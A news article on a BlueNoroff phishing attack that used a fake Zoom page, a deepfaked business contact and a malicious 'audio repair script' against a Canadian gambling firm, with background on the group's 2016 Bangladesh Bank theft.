A representative from a Canadian online gambling firm thought they were having a standard Zoom call with a familiar contact but was, in fact, conversing with North Korean hackers on a fake version of the platform. 

Field Effect Analysis reported that on May 28, the unnamed company was targeted by BlueNoroff, a subgroup of the infamous Lazarus Group, which is supported by North Korea. 

BlueNoroff is a financially driven threat actor that usually focuses on banks and cryptocurrency exchanges, along with gaming and entertainment sectors, and financial technology firms, to generate income for North Korea. 

The gang has taken over US$1.3 billion since 2017, primarily via SWIFT banking thefts and cryptocurrency heists. 

Deepfake 

Field Effect reported that BlueNoroff set up a fraudulent website mimicking an authentic Zoom support page to attack the gaming firm. The assailants impersonated an actual business associate and arranged a Zoom meeting with the target utilizing deepfake technology. 

In the Zoom meeting, the hackers pretended to have "audio issues," and the victim was instructed to execute a "Zoom audio repair script" to resolve the situation. However, the script was malicious software. 

Upon execution, the script initiated a series of downloads and commands, asking the user for system credentials and quietly installing several malicious payloads. This enabled the attackers to obtain various sensitive personal and system information, particularly targeting cryptocurrency-related assets and messaging data. 

According to Field Effect, the assault seems to be a component of a wider Zoom impersonation effort initially detected in March 2025 that has primarily focused on cryptocurrency firms. 

“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the analysts wrote.

Bangladesh Bank Robbery 

BlueNorroff achieved its most infamous milestone in February 2016, when the group effectively implanted malware into the servers of Bangladesh Bank. This enabled them to secure credentials allowing 35 transfer requests from the New York Fed to accounts in the Philippines and Sri Lanka, amounting to nearly $1 billion. 

Out of the 35 payments, five, amounting to US$101 million, were executed before an employee at the New York Fed noticed something suspicious and halted additional transactions. 

Approximately $20 million flowed into Sri Lanka and was swiftly reclaimed. The remainder was moved to four accounts at the Philippine bank RCBC, which had been opened that same day using fake identities. From that point, it found its way into the loosely regulated Philippine casino sector, where it was washed at VIP gaming tables, before vanishing without a sign.